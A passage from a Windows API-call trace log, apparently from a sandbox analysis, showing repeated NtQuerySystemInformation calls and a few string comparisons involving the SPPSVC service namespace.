ResultLength=0x0) [0227.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0227.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd560, Length=0x50, ResultLength=0x0) [0227.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4e0, Length=0x28, ResultLength=0x0) [0227.324] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd560, Length=0x50, ResultLength=0x0) [0227.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd560, Length=0x50, ResultLength=0x0) [0227.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd560, Length=0x50, ResultLength=0x0) [0227.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0227.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0227.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0227.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0227.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x28, ResultLength=0x0) [0227.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0227.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x28, ResultLength=0x0) [0227.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x28, ResultLength=0x0) [0227.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x20, ResultLength=0x0) [0227.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0227.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0227.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0227.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0227.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0227.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0227.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0227.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0227.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x40, ResultLength=0x0) [0227.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x40, ResultLength=0x0) [0227.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x40, ResultLength=0x0) [0227.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x30, ResultLength=0x0) [0227.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x30, ResultLength=0x0) [0227.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd418, Length=0x30, ResultLength=0x0) [0227.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd380, Length=0x38, ResultLength=0x0) [0227.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0227.347] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0227.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0227.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0227.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x28, ResultLength=0x0) [0227.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0227.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0227.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x20, ResultLength=0x0) [0227.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0227.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0227.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0227.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0227.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x40, ResultLength=0x0) [0227.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x40, ResultLength=0x0) [0227.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x40, ResultLength=0x0) [0227.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x30, ResultLength=0x0) [0227.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x30, ResultLength=0x0) [0227.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd418, Length=0x30, ResultLength=0x0) [0227.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd380, Length=0x38, ResultLength=0x0) [0227.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0227.365] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0227.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0227.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0227.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x28, ResultLength=0x0) [0227.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0227.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0227.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0227.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0227.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0227.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0227.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0227.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0227.374] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0227.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0227.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.377] NtQuerySystemInformation 